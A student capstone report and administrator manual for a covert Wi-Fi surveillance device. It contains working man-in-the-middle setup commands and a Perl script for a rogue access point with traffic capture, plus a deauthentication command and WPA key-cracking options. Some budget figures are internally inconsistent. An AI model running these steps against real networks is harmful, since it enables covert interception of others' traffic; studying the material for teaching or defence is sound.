April 10, 2015
NETWORK SURVEILLANCE APPARATUS
WiFiSpi SAIT Polytechnic
Final Report
Network Surveillance Apparatus
Aaron Collier, Steven Tran-Giang, Scott Matheson
WIFISPI PROJECT CHARTER PAGE 1
Table of Contents
Executive Summary .................................................................................................................... 3
Introduction .................................................................................................................................. 4
Project Purpose ........................................................................................................................... 5
Problem / Opportunity ................................................................................................................. 5
Background .................................................................................................................................. 5
Project Goal ................................................................................................................................. 5
Objectives .................................................................................................................................... 5
Key Stakeholders ........................................................................................................................ 6
Project Scope .............................................................................................................................. 7
Scope ........................................................................................................................................... 7
Out of Scope ................................................................................................................................ 7
Project Plan ................................................................................................................................. 8
Major Milestones ......................................................................................................................... 8
Budget .......................................................................................................................................... 9
Proposed Budget ......................................................................................................................... 9
Actual Budget .............................................................................................................................. 9
Results and Achievements ....................................................................................................... 10
Lessons Learned ....................................................................................................................... 10
Recommendations .................................................................................................................... 13
Conclusion ................................................................................................................................. 14
Acknowledgements ................................................................................................................... 15
References ................................................................................................................................ 16
Appendix .................................................................................................................................... 18
Terminology ............................................................................................................................... 18
Source Code .............................................................................................................................. 19
Setup/Configuration Script ........................................................................................................ 19
Preface ......................................................................................................................................... 2
Materials Needed ........................................................................................................................ 3
System Installation ...................................................................................................................... 4
Tool Configuration ....................................................................................................................... 5
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 2
DHCPD (/etc/dhcpd.conf)............................................................................................................ 5
wpa_supplicant (Wireless connection tool for cli)....................................................................... 5
airbase-ng (Wireless access point) ............................................................................................. 5
iptables (interface bridging and nat translation) ......................................................................... 6
Final Configuration Steps ............................................................................................................ 6
Other Commands ........................................................................................................................ 6
Example Script ............................................................................................................................ 7
Section 1: Executive Summary
This report outlines the vision and goal of our final Capstone Project at SAIT Polytechnic. The Network Surveillance Apparatus is a low-cost surveillance device intended for monitoring potential cyber criminals. The project was completed by Team WiFiSpi (Aaron Collier, Scott Matheson and Steven Tran-Giang) under the supervision of Colin Chamberlain. The idea came from wanting a cheap and easy way to survey a network without being detected. The device intercepts packets and relays them to our server, where Snort filters out any suspicious packets that match our rule sets. The device is built on a Hummingboard with two wireless NICs and an Alfa USB wireless adapter. Construction costs approximately $503 and labour approximately $28,080, for a grand total of about $28,583. The skills required were scripting, a firm grasp of Linux, knowledge of NICs and Snort and, most importantly, the ability to troubleshoot. At the end of the project Team WiFiSpi will present the final deliverable, the Network Surveillance Apparatus, to SAIT instructors, the general public and IT professionals at the Information Technology Computer Systems Capstone Project Showcase.
Section 2: Introduction
The Network Surveillance Apparatus is our idea for a cheap and easy way of monitoring a suspicious network while leaving a minimal footprint on it. We started by looking for a mini PC capable of performing a man-in-the-middle attack and capturing the packets sent from the network's hosts to the router. We chose the Hummingboard because it offered everything we needed spec-wise. As wireless becomes more prevalent, not only in industry but anywhere in a city, monitoring suspicious traffic becomes much harder to do. With this device we plan to make it easier to monitor that traffic in a way that is both inconspicuous and affordable.
Section 3: Project Purpose
Currently there are few devices that allow network traffic to be tracked without leaving a footprint. The purpose of this project was to design and build a device that covertly records the network traffic of a user or network. We planned to apply it in a law enforcement setting, where an officer could set up the device and gather information on potential cyber criminals. The device was also designed to send the logged packets back to a server, where they are filtered through Snort for suspicious activity.
Problem / Opportunity
With this device we hope to appeal not only to law enforcement but also to companies who want an inexpensive way of monitoring their own network, whether for misuse of company equipment or for unwanted guests on the network.
Background
The initial idea for the Network Surveillance Apparatus came from Scott Matheson. With Wi-Fi becoming more and more prevalent in today's society, he wanted a way to monitor traffic over wireless without having to be plugged directly into the network. Originally the idea was closer to the black hat side; group member Aaron Collier pushed it toward the white hat side.
Project Goal
The goal of Team WiFiSpi is to create a working prototype of the Network Surveillance Apparatus that can be deployed in a law enforcement setting or a corporate environment.
Objectives
Objectives of the project that were completed:
- Design and build a working prototype minicomputer capable of conducting a successful man-in-the-middle attack.
- Design a working Snort server that filters out suspicious packets collected by the NSA (the Network Surveillance Apparatus).
- Implement an FTP server between the NSA and the server, able to transfer all collected packets.
- Implement SSH on the NSA for remote access.
- Automate the majority of the NSA's setup.
Key Stakeholders
These are the four key stakeholders for the project:

  Stakeholder               Name(s)
  Project Manager           Aaron Collier, Scott Matheson, Steven Tran-Giang
  Client                    Colin Chamberlain
  Performing Organization   WiFiSpi
  Sponsor                   Colin Chamberlain

Section 4: Project Scope
The key components of the Network Surveillance Apparatus are designed to intercept packets, execute a successful man-in-the-middle attack, log suspicious packets and send them to our server. These are the major components we committed to; we also had several ideas we wished to implement if enough time remained at the end of the project.
Scope
The major components included in this project are:
- Intercept packets
- Execute a successful man-in-the-middle attack
- Log all packets into a capture file
- Send the capture file to our Snort server through FTP
- Filter out suspicious packets using Snort rule sets

Potential components we would have added with more time:
- Decrypting encrypted packets
- Cellular capabilities
Out of Scope
Some things we considered for the project but chose to exclude are:
- Remote management
- Concealment
- Battery optimization
- Intelligent automation
Section 5: Project Plan
The project was divided into three sections, each overseen by a group member:
- Building and troubleshooting hardware components: Aaron Collier
- Learning, utilizing, optimizing and assembling software packages for tool use: Scott Matheson
- Creating troubleshooting scripts and software: Steven Tran-Giang
Major Milestones
The following major milestones were accomplished over the course of this project:
- Arch Linux successfully running on the Hummingboard
- All tools successfully installed on the Hummingboard
- Snort successfully filtering packets
- Successful man-in-the-middle attack with the Hummingboard
Section 6: Budget
Proposed Budget

Hardware costs
  Item                                  Cost
  HummingBoard-i2ex                     ~$110.00 USD
  HP ProLiant DL360P G8                 $2,104.83 CDN
  Computer (hash calculation system)    ~$1,000 CDN
  Wireless network interface card       ~$60 CDN
  Contingency funds                     $500 CDN

Operating costs
  Item     Hours   Rate     Cost
  Aaron    500     $90/hr   $45,000
  Steven   500     $90/hr   $45,000
  Scott    500     $90/hr   $45,000
Actual Budget

Hardware costs
  Item                                  Cost
  HummingBoard-i2ex                     ~$110.00 USD
  HP ProLiant DL360P G8                 $2,104.83 CDN
  Alfa wireless USB card                $42.99
  Wireless network interface card       ~$60 CDN
  Contingency funds                     $500 CDN

Operating costs
  Item     Hours   Rate     Cost
  Aaron    79      $90/hr   $7,110
  Steven   58      $90/hr   $5,220
  Scott    95      $90/hr   $8,550
Section 7: Results and Achievements
Upon completion of this project Team WiFiSpi has produced:
- A functional Hummingboard capable of executing a successful man-in-the-middle attack, intercepting and logging packets, and sending the captured packets to our FTP/Snort server for filtering.
- An FTP/Snort server capable of receiving capture files from the NSA and filtering packets against a rule set for further analysis.
- A better understanding of how easy it is to intercept packets over wireless.
- An understanding of the entire process of taking on a project and the steps needed to complete it from beginning to end.
The completion of this project has helped each group member grow as an IT professional.
Lessons Learned
The following is the command reference the team built up while getting each tool working. Interface names (wlp1s0, wlan0, eth0, mon0, at0) are the ones seen on our hardware.

Wi-Fi (client side)
- ip link set wlp1s0 up
- iw dev wlp1s0 scan (access point scan; not needed for setup)
- iw dev wlp1s0 set type ibss (ad-hoc mode)
- wpa_supplicant -B -D nl80211,wext -i wlp1s0 -c <(wpa_passphrase "SSID" "WPA2 key")
- wpa_passphrase "ssid" "pass" >> /etc/wpa_supplicant.conf (persistent alternative to the process substitution above)
- dhcpcd wlp1s0
- iw dev wlp1s0 link (checks the connection)

Aircrack-ng suite (monitor mode)
- ifconfig wlp1s0 down
- iwconfig wlp1s0 mode monitor
- ifconfig wlp1s0 up
- airmon-ng start wlp1s0
- airodump-ng mon0

aircrack-ng options
- -b <AP MAC>: target BSSID
- -l <outfile.txt>: write the recovered key to a file
- -S: WPA cracking speed test
- -r <path/to/airolib/database>: use a precomputed airolib-ng database

tcpdump options
- -F <file>: read the filter expression from a file
- -i <interface>
- -w <file>: write raw packets to a capture file
- -vvv: three levels of verbosity
Filter expressions were written per protocol: TCP, UDP, HTTP, HTTPS, SFTP, SSL, POP, IMAP, FTP, SMTP.

airbase-ng (soft access point)
- airbase-ng -a <AP MAC> --essid "ssid" -c <channel> mon0
- -Z 4: advertise WPA2 CCMP (used together with -W 1)
- -F <foo.pcap>: write all frames to a packet output file

Bridged AP
- airmon-ng start wlan0 11
- airbase-ng -e SSID -c 6 -W 1 -Z 4 mon0 &
- ifconfig at0 up
- ifconfig at0 192.168.2.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- ifconfig wlan0 mtu 2000
- tcpdump -ni at0 -s0 -w capture.pcap
- iwconfig wlan0 frag 2346
- iwconfig wlan0 channel 36
- route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
- iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
- iptables -A FORWARD -i eth0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT
- iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
- echo 1 > /proc/sys/net/ipv4/ip_forward
- dhcpd at0

Monitor a single AP
- airodump-ng -d <AP MAC> -a -c 1 wlp1s0

Deauthentication
- aireplay-ng -0 6 -a <AP MAC> -c <client MAC> mon0

Install Snort (CentOS 7)
- yum install flex bison libpcap libpcap-devel zlib zlib-devel pcre pcre-devel libdnet libdnet-devel tcpdump
- yum install http://www.snort.org/downloads/snort/snort-2.9.7.2-1.centos7.x86_64.rpm

SFTP (sshd_config directives to review on the capture server)
- AllowUsers
- UsePAM
- PasswordAuthentication
- PermitRootLogin
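The four sshd_config directives listed under SFTP above are the ones that decide whether the capture server can be reached by password guessing or as root. The script below is an added example, not part of the WiFiSpi project code: it reads an sshd_config the way sshd does (first occurrence of a keyword wins, comments ignored) and reports any of the four that is missing or weak. The two configuration files are constructed samples written to temporary files, and the account name nsa-drop is an assumption.

```shell
#!/bin/sh
# Added example (not WiFiSpi project code): audit the sshd_config directives
# the Lessons Learned list names, so the SFTP drop-box for capture files
# accepts key-only, non-root, allow-listed logins.
# Policy assumed: PermitRootLogin no, PasswordAuthentication no, UsePAM yes,
# AllowUsers set to at least one account (the hypothetical "nsa-drop").

# value_of FILE KEYWORD: print the value of the first uncommented KEYWORD
# line (sshd uses the first match for a keyword), or nothing if absent.
value_of() {
    awk -v key="$2" 'tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# audit_sshd FILE: print one line per finding; return 0 if clean, 1 otherwise
audit_sshd() {
    cfg=$1; rc=0
    v=$(value_of "$cfg" PermitRootLogin)
    [ "$v" = "no" ] || { echo "PermitRootLogin is '${v:-unset, default prohibit-password}'; set it to no"; rc=1; }
    v=$(value_of "$cfg" PasswordAuthentication)
    [ "$v" = "no" ] || { echo "PasswordAuthentication is '${v:-unset, default yes}'; set it to no and use keys"; rc=1; }
    v=$(value_of "$cfg" UsePAM)
    [ "$v" = "yes" ] || { echo "UsePAM is '${v:-unset}'; set it to yes so account and lockout policy apply"; rc=1; }
    v=$(value_of "$cfg" AllowUsers)
    [ -n "$v" ] || { echo "AllowUsers is unset; restrict logins to the drop-box account"; rc=1; }
    return $rc
}

# Constructed sample: the kind of config a freshly installed server ships with
WEAK_CFG=$(mktemp); cat >"$WEAK_CFG" <<'EOF'
# sshd_config before hardening
PermitRootLogin yes
#PasswordAuthentication no
UsePAM yes
Subsystem sftp /usr/lib/openssh/sftp-server
EOF

# Constructed sample: the hardened version
STRONG_CFG=$(mktemp); cat >"$STRONG_CFG" <<'EOF'
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
UsePAM yes
AllowUsers nsa-drop
Subsystem sftp internal-sftp
EOF

for f in "$WEAK_CFG" "$STRONG_CFG"; do
    if audit_sshd "$f"; then echo "$f: OK"; else echo "$f: needs hardening"; fi
done
```

Run it against /etc/ssh/sshd_config on the Snort server (audit_sshd /etc/ssh/sshd_config) before opening the SFTP port; a commented-out directive counts as unset, because sshd falls back to its compiled-in default in that case.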
Section 8: Recommendations
Technical Recommendations
- Use a microcomputer that you know is compatible with the OS you want to use.
- Make sure the chipsets of all wireless adapters are compatible with, and fully supported by, the tools you plan to run.
- Know the security policies of the network you are on.
- Verify hardware driver support before buying.

Team Recommendations
- Start the project ASAP, or you will fall behind very quickly.
- Account for last-minute changes and emergencies in your Gantt chart.
- Document, document, document.
- If you come up with your own project, be prepared for a lot of self-guidance.
- Know that anything that can go wrong will go wrong.
Section 9: Conclusion
Team WiFiSpi successfully created a prototype, the NSA, that intercepts packets and transfers the capture files to an FTP/Snort server for further analysis. We also created a proof-of-concept Snort server which, given more time, would filter out suspicious packets using rule sets we have created or chosen to suit our needs. Throughout the project we encountered many obstacles, from Kali and PwnPi not working on the Hummingboard to SAIT's network policies interfering with our interception of packets; we faced each problem thrown at us and achieved what we set out to do. The final product, the Network Surveillance Apparatus, is a fully functioning wireless surveillance device.
Section 10: Acknowledgements
Team WiFiSpi wishes to thank the individuals and communities who provided invaluable knowledge and assistance to our project:
- Colin Chamberlain, project sponsor: provided server hardware, monitors, keyboards and mice, and kept us on track with the project over the last thirteen weeks.
- Tim Williams: help with tcpdump and Snort.
- Dylan Saunders: tunnelling two connections.
- Jason Fisher: miscellaneous hardware and access to a soldering iron.
- The Arch Linux, Solid-Run and Aircrack-ng communities.
- William Parker: CentOS Snort setup guide.
- The Linux man pages.
Section 11: References

[1] W. Parker, S3.amazonaws.com, 2015. [Online]. Available: https://s3.amazonaws.com/snort-org-site/production/document_files/files/000/000/063/original/snort-centos6x-7x-2970.pdf?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1428438869&Signature=EWsj4fK2P3IsVRBUyaJZss%2BRLMo%3D. [Accessed: 07-Apr-2015].
[2] F. Wiles, 'HOWTO: Linux NAT in Four Steps using iptables', Revolution Systems, 2015. [Online]. Available: http://www.revsys.com/writings/quicktips/nat.html. [Accessed: 10-Apr-2015].
[3] Aircrack-ng.org, 'Aircrack-ng - Main documentation', 2015. [Online]. Available: http://www.aircrack-ng.org/documentation.html. [Accessed: 10-Apr-2015].
[4] Linux.die.net, 'dhcpd(8): Dynamic Host config Protocol Server - Linux man page', 2015. [Online]. Available: http://linux.die.net/man/8/dhcpd. [Accessed: 10-Apr-2015].
[5] Daemon-systems.org, 'dhcpcd.8', 2015. [Online]. Available: http://www.daemon-systems.org/man/dhcpcd.8.html. [Accessed: 10-Apr-2015].
[6] Tcpdump.org, 'Manpage of TCPDUMP', 2015. [Online]. Available: http://www.tcpdump.org/tcpdump_man.html. [Accessed: 10-Apr-2015].
[7] Linux.die.net, 'iwconfig(8) - Linux man page', 2015. [Online]. Available: http://linux.die.net/man/8/iwconfig. [Accessed: 10-Apr-2015].
[8] Linux.die.net, 'wpa_supplicant(8) - Linux man page', 2015. [Online]. Available: http://linux.die.net/man/8/wpa_supplicant. [Accessed: 10-Apr-2015].
[9] Linux.die.net, 'wpa_passphrase(8) - Linux man page', 2015. [Online]. Available: http://linux.die.net/man/8/wpa_passphrase. [Accessed: 10-Apr-2015].
[10] Ipset.netfilter.org, 'Man page of IPTABLES', 2015. [Online]. Available: http://ipset.netfilter.org/iptables.man.html. [Accessed: 10-Apr-2015].
[11] Wiki.solid-run.com, 'CuBox-i Wiki Pages', 2015. [Online]. Available: http://wiki.solid-run.com/Main_Page. [Accessed: 10-Apr-2015].
[12] Wiki.archlinux.org, 'ArchWiki', 2015. [Online]. Available: https://wiki.archlinux.org/. [Accessed: 10-Apr-2015].
Appendix A: Terminology

The following terms are used within this document and may require further explanation:

Packet: A formatted unit of data exchanged on a packet-switched network; it carries the addressing and control information that lets computers talk to each other.
NIC: Network interface controller; the hardware that connects a computer to a network.
Snort: An open source intrusion detection and prevention system.
Microcomputer: A single-board computer roughly the size of a credit card.
Footprint: The impact you have on a network; the traffic and traces your presence leaves behind.
Cyber criminal: An individual committing illegal activities through the use of a computer and the internet.
Black hat: An individual who breaks into a system with nefarious intentions.
White hat: An individual who breaks into a system with good intentions (research, vulnerability testing).
Man-in-the-middle attack: An attack in which a third party relays traffic between two parties who believe they are talking directly to each other, letting the attacker read, and potentially alter, the conversation without either party knowing.
FTP server: A server for the File Transfer Protocol, used to transfer files between computers.
SSH: Secure Shell, used for remote access.
Capture file: A log of the traffic seen on a network, recorded by capture software such as tcpdump.
Encrypt: The process of encoding messages so that only authorized parties can read them.
Decrypt: The process of decoding encrypted messages.
Appendix B: Source Code

Setup/Configuration Script

The quick start script below is the one the team used to bring up the device. Compared with the version that ran during the project, it declares its variables, quotes its string comparisons, reads from STDIN, passes command arguments as lists so nothing the operator types is interpreted by a shell, feeds the Wi-Fi passphrase to wpa_passphrase on standard input instead of the command line (where it would be visible in the process list), writes the resulting configuration readable by root only, handles an open backend network, and creates the monitor interface once rather than twice.

#!/usr/bin/perl
# Quick start configuration script for the Network Surveillance Apparatus.
# Brings up the backend uplink (wired, or wireless via wpa_supplicant), starts
# the soft access point on a second wireless adapter, NATs the soft AP's at0
# interface through the backend, serves DHCP to clients and captures their
# traffic with tcpdump. Must be run as root.
use strict;
use warnings;
use IPC::Open2;

my $wireless = "";
my $backpass = "";
my ($backadapt, $backssid, $passphrase, $apadapt, $apssid);

print "Quick start Configuration script\n\n";
while ($wireless ne "Y" && $wireless ne "N") {
    print "Will you be using a wireless backend? (Y/N): ";
    chomp($wireless = <STDIN>);
    $wireless = uc($wireless);
    if ($wireless eq "Y") {
        system("iwconfig");
        print "Please indicate wireless interface you wish to use: ";
        chomp($backadapt = <STDIN>);
        print "Please indicate the SSID(name) of the wireless connection you wish to use: ";
        chomp($backssid = <STDIN>);
        while ($backpass ne "Y" && $backpass ne "N") {
            print "Is there a passphrase on this connection? Y/N: ";
            chomp($backpass = <STDIN>);
            $backpass = uc($backpass);
            if ($backpass eq "Y") {
                print "Please enter the passphrase (Case sensitive): ";
                system("stty", "-echo");    # do not echo the passphrase to the terminal
                chomp($passphrase = <STDIN>);
                system("stty", "echo");
                print "\n";
            } elsif ($backpass eq "N") {
                print "No wireless passphrase selected\n";
            } else {
                print "Error: Invalid input\n\n";
            }
        }
    } elsif ($wireless eq "N") {
        system("ifconfig");
        print "Please indicate physical interface you wish to use: ";
        chomp($backadapt = <STDIN>);
    } else {
        print "Error: Invalid input\n\n";
    }
}

system("iwconfig");
print "NOTE: If using a wireless backend you must use a secondary wireless interface for soft AP configuration\n";
print "Please indicate wireless interface you wish to use for soft access point: ";
chomp($apadapt = <STDIN>);
print "Please indicate the name(SSID) you wish to broadcast: ";
chomp($apssid = <STDIN>);
print "Please wait while system is configured..\n";
sleep(2);

# Stop anything left over from a previous run and reset the firewall.
# Arguments are passed as lists (no shell), so interface names and SSIDs
# typed by the operator are never interpreted by a shell.
system("killall", "-9", $_) for qw(dhcpd airbase-ng dhcpcd wpa_supplicant tcpdump);
system("airmon-ng", "stop", "mon$_") for reverse 0 .. 3;
system("iptables", @$_) for (
    ["-F"], ["-X"], ["-t", "nat", "-F"], ["-t", "nat", "-X"],
    ["-P", "INPUT", "ACCEPT"], ["-P", "FORWARD", "ACCEPT"], ["-P", "OUTPUT", "ACCEPT"],
);
sleep(3);

if ($wireless eq "Y") {
    system("ip", "link", "set", $backadapt, "up");
    sleep(2);
    my @conf;
    if (defined $passphrase) {
        # Feed the passphrase to wpa_passphrase on stdin instead of the command
        # line, where it would be visible to every user in the process list.
        my $pid = open2(my $out, my $in, "wpa_passphrase", $backssid);
        print $in "$passphrase\n";
        close($in);
        @conf = <$out>;
        close($out);
        waitpid($pid, 0);
    } else {
        # Open network: wpa_passphrase cannot produce this block.
        @conf = ("network={\n", "\tssid=\"$backssid\"\n", "\tkey_mgmt=NONE\n", "}\n");
    }
    umask(077);    # the config holds the PSK; make it readable by root only
    open(my $cfg, ">", "/etc/wpa_supplicant.conf") or die "cannot write /etc/wpa_supplicant.conf: $!";
    print $cfg @conf;
    close($cfg);
    system("wpa_supplicant", "-B", "-D", "nl80211,wext", "-i", $backadapt, "-c", "/etc/wpa_supplicant.conf");
    sleep(10);
    system("dhcpcd", $backadapt);
    sleep(5);
}

# Create the monitor interface (mon0) and start the soft AP on it.
system("airmon-ng", "start", $apadapt);
sleep(5);
background("airbase-ng", "-e", $apssid, "-c", "1", "mon0");
sleep(5);
system("ifconfig", "at0", "up");
system("ifconfig", "at0", "192.168.2.1", "netmask", "255.255.255.0");
system("ifconfig", "at0", "mtu", "1800");
system("route", "add", "-net", "192.168.2.0", "netmask", "255.255.255.0", "gw", "192.168.2.1");
system("iptables", "-t", "nat", "-A", "POSTROUTING", "-o", $backadapt, "-j", "MASQUERADE");
system("iptables", "-A", "FORWARD", "-i", $backadapt, "-o", "at0", "-m", "state", "--state", "RELATED,ESTABLISHED", "-j", "ACCEPT");
system("iptables", "-A", "FORWARD", "-i", "at0", "-o", $backadapt, "-j", "ACCEPT");
write_file("/proc/sys/net/ipv4/ip_forward", "1\n");
write_file("/var/lib/dhcp/dhcpd.leases", "");    # clear stale leases
system("dhcpd", "at0");
mkdir "/root/capture" unless -d "/root/capture";
background("tcpdump", "-ni", "at0", "-s", "0", "-w", "/root/capture/capture.pcap");
sleep(2);
print "Setup Complete.\n";

# Run a command in the background without going through a shell.
sub background {
    my @cmd = @_;
    my $pid = fork();
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) { exec(@cmd) or die "exec @cmd failed: $!"; }
}

# Overwrite a file with the given content.
sub write_file {
    my ($path, $content) = @_;
    open(my $fh, ">", $path) or die "cannot write $path: $!";
    print $fh $content;
    close($fh);
}
WiFiSpi SAIT Polytechnic
Administrator Manual
Network Surveillance Apparatus
Aaron Collier, Steven Tran-Giang, Scott Matheson
Table of Contents
Preface ......................................................................................................................................... 2
Materials Needed ........................................................................................................................ 3
System Installation ...................................................................................................................... 4
Tool Configuration ....................................................................................................................... 5
DHCPD (/etc/dhcpd.conf)............................................................................................................ 5
wpa_supplicant (Wireless connection tool for cli)....................................................................... 5
airbase-ng (Wireless access point) ............................................................................................. 5
iptables (interface bridging and nat translation) ......................................................................... 6
Final Configuration Steps ............................................................................................................ 6
Other Commands ........................................................................................................................ 6
Example Script ............................................................................................................................ 7
Preface
The following manual will guide you through the installation, configuration and management of the Network Surveillance Apparatus developed by Team WiFiSpi. This guide assumes foundational knowledge of the Linux operating system, a scripting language (Perl is used throughout this manual) and Linux networking tools. This is a very early alpha prototype and is still missing some of the more advanced features and configurations.
Section 1: Materials Needed
Hardware:
- ARM microcomputer (Solid-Run Hummingboard-i2eX used in this example)
- 2 wireless network adapters (Atheros chipset recommended)
  - http://www.aircrack-ng.org/doku.php?id=compatibility_drivers has a comprehensive list of chipset compatibility with the aircrack-ng suite
- MicroSD storage (32-64 GB recommended)
- Back-end server capable of running an FTP server as well as a Snort detection box
  - A Linux-based operating system is recommended for best results
- Wireless router
- Wireless host system

Software:
- Linux-based operating system
  - Arch Linux is recommended due to its lightweight design
- Aircrack-ng suite
  - Please note: additional driver patches may be necessary to ensure wireless adapter functionality
- dhcpd (DHCP server daemon)
- dhcpcd (DHCP client daemon)
- tcpdump
- iwconfig
- wpa_supplicant and wpa_passphrase
- iptables
- SDFormatter (Windows, for preparing the SD card)
- Win32DiskImager (Windows, for writing the image)
Section 2: System Installation
1. Download the operating system image of your choice (installation may vary depending on hardware configuration).
2. Prepare the SD card by performing a full format.
   - SDFormatter is a simple Windows tool to achieve this.
   - On Linux, partition the card with fdisk and create the filesystem with mkfs.
3. Image the operating system onto the SD card.
   - Win32DiskImager is a simple Windows disk imaging tool.
   - dd is a Linux tool that can be used to image disks.
4. Insert the SD card into the microcomputer and run any updates and initial configuration as defined by the developer.
5. Install all required tools and modules from the official system or git repositories. Note: some tools may come pre-packaged with your chosen distribution; verify whether they are already installed before attempting to install them.
   - Aircrack-ng suite
   - dhcpd
   - dhcpcd
   - tcpdump
   - iwconfig
   - wpa_supplicant
   - wpa_passphrase
   - iptables
Section 3: Tool Configuration
The following are example configurations used in testing to enable basic functionality of the device. These configurations may be changed in order to promote further and more advanced functions.
DHCPD (/etc/dhcpd.conf)

    option domain-name-servers 208.67.222.222, 208.67.220.220;
    default-lease-time 600;
    max-lease-time 7600;
    ddns-update-style none;
    authoritative;
    log-facility local7;
    subnet 192.168.2.0 netmask 255.255.255.0 {
        range 192.168.2.2 192.168.2.254;
        option routers 192.168.2.1;
        option domain-name-servers 208.67.222.222, 208.67.220.220;
    }
wpa_supplicant (Wireless connection tool for cli)

    wpa_passphrase "WirelessSSID" "WPA2Passphrase" > /etc/wpa_supplicant.conf
        Creates the configuration file with your wireless credentials. The passphrase is passed on the command line and is therefore visible in the process list while the command runs, and the resulting file contains the PSK, so keep it readable by root only.
    wpa_supplicant -B -D nl80211,wext -i wlan0 -c /etc/wpa_supplicant.conf
        Uses the wireless credentials to establish the connection
    dhcpcd wlan0
        Client-side DHCP client
airbase-ng (Wireless access point)

    airmon-ng start wlan1
        Starts a monitor-mode interface (mon0) on wlan1
    airbase-ng -e "WirelessSSID" -c 1 mon0 &
        Creates an unencrypted soft access point on channel 1 as a background job; client traffic appears on the tap interface at0
    ifconfig at0 up
        Makes the soft AP interface active
    ifconfig at0 192.168.2.1 netmask 255.255.255.0
        Assigns an IP and netmask to the interface to match the dhcpd configuration
    ifconfig at0 mtu 1800
        Increases the maximum transmission unit (in bytes) for the interface
    route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
        Adds the subnet to the Linux routing table
iptables (interface bridging and nat translation)

    iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
    iptables -A FORWARD -i wlan0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT
    iptables -A FORWARD -i at0 -o wlan0 -j ACCEPT
    echo 1 > /proc/sys/net/ipv4/ip_forward
        Creates simple NAT (routed, not a layer-2 bridge) between the two interfaces: client traffic from at0 is masqueraded out through wlan0 and the replies are forwarded back to at0
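The three rules above only restrict anything if the FORWARD chain's policy is DROP; the quick start script in the report sets it to ACCEPT first, so every packet is forwarded regardless, and with INPUT left at ACCEPT a soft-AP client can also reach the device's own SSH. The script below is an added example, not WiFiSpi project code, that applies the same NAT with those two points corrected. Interface names and the 192.168.2.0/24 subnet come from this manual; DRY_RUN=1 (the default here) prints the commands instead of executing them so the rule set can be reviewed without root.

```shell
#!/bin/sh
# Added example, not WiFiSpi project code: the manual's NAT rules with the
# weak parts corrected. FORWARD defaults to DROP so only the rules below
# pass traffic, only the soft-AP subnet is masqueraded, and soft-AP clients
# may talk to this box's DHCP server and nothing else on it.
# Interface names wlan0/at0 and 192.168.2.0/24 are the manual's.
# DRY_RUN=1 (default) prints the commands; run with DRY_RUN=0 as root on the
# device to apply them.

run() {
    if [ "${DRY_RUN:-1}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# apply_nat BACKEND_IF AP_IF AP_SUBNET
apply_nat() {
    backend=$1; ap=$2; subnet=$3
    # start from a clean slate, as the project's script does
    run iptables -F
    run iptables -X
    run iptables -t nat -F
    run iptables -t nat -X
    # corrected: nothing is forwarded unless a rule below allows it
    run iptables -P INPUT ACCEPT
    run iptables -P FORWARD DROP
    run iptables -P OUTPUT ACCEPT
    # soft-AP clients may obtain a lease from this box (DHCP, UDP 67) and nothing else
    run iptables -A INPUT -i "$ap" -p udp --dport 67 -j ACCEPT
    run iptables -A INPUT -i "$ap" -j DROP
    # masquerade only the soft-AP subnet, not everything leaving the backend
    run iptables -t nat -A POSTROUTING -s "$subnet" -o "$backend" -j MASQUERADE
    # replies back to clients, then new flows from clients out
    run iptables -A FORWARD -i "$backend" -o "$ap" -m state --state RELATED,ESTABLISHED -j ACCEPT
    run iptables -A FORWARD -i "$ap" -o "$backend" -s "$subnet" -j ACCEPT
    run sysctl -w net.ipv4.ip_forward=1
}

apply_nat wlan0 at0 192.168.2.0/24
```

The INPUT DROP on at0 does not affect DHCP replies (those leave via OUTPUT) or the capture itself (tcpdump sees frames before netfilter), so clients still get a lease and still get recorded; they just cannot reach the Hummingboard's management services.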
Final Configuration Steps

    echo > /var/lib/dhcp/dhcpd.leases
        Clears the leases file (note: the file path may vary with distribution)
    dhcpd at0
        Starts the DHCP server on the soft AP so hosts can obtain IP leases
    tcpdump -ni at0 -s 0 -w /path/to/captures/capture.pcap &
        Begins dumping all traffic on at0 to a pcap file
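The tcpdump line above writes a single ever-growing capture.pcap, and the report's scope sends it to the Snort server over FTP, which carries the file in clear and gives the server no way to tell whether it arrived intact. For evidence that may end up in front of a court, that matters. The script below is an added example, not WiFiSpi project code: it rotates tcpdump output into timestamped files, records a SHA-256 manifest so the server can prove the pcaps were not altered in transit or at rest, pushes them over SFTP and runs Snort against them offline. The host nsa-server, the account nsa-drop, its key file and the /srv/captures path are assumptions; the demo data is two constructed, empty but valid pcap files written to a temporary directory.

```shell
#!/bin/sh
# Added example, not WiFiSpi project code: shipping capture files to the
# Snort server while preserving their evidential value. nsa-server,
# nsa-drop, /root/.ssh/nsa-drop and /srv/captures are assumed names;
# /etc/snort/snort.conf is the stock path from the Snort RPM.

CAP_DIR=${CAP_DIR:-/root/capture}

# start_capture IFACE: the manual's tcpdump line, but rotated every 600 s
# (-G) into timestamped files so finished files can be shipped while the
# capture continues. Needs root and a live at0; not invoked below.
start_capture() {
    tcpdump -ni "$1" -s 0 -G 600 -w "$CAP_DIR/capture-%Y%m%d-%H%M%S.pcap" &
}

# write_manifest DIR: hash every pcap in DIR into DIR/MANIFEST.sha256
write_manifest() {
    ( cd "$1" && sha256sum ./*.pcap > MANIFEST.sha256 )
}

# verify_manifest DIR: exit 0 only if every listed pcap still matches its hash
verify_manifest() {
    ( cd "$1" && sha256sum -c MANIFEST.sha256 > /dev/null )
}

# ship_captures DIR: batch-mode SFTP with a dedicated key; no passwords, no FTP
ship_captures() {
    printf 'put %s/*.pcap /srv/captures/\nput %s/MANIFEST.sha256 /srv/captures/\n' "$1" "$1" |
        sftp -b - -i /root/.ssh/nsa-drop nsa-drop@nsa-server
}

# analyze_captures DIR: server side. Verify the manifest first, then let
# Snort read the pcaps (-r) instead of a live interface, alerts to console.
analyze_captures() {
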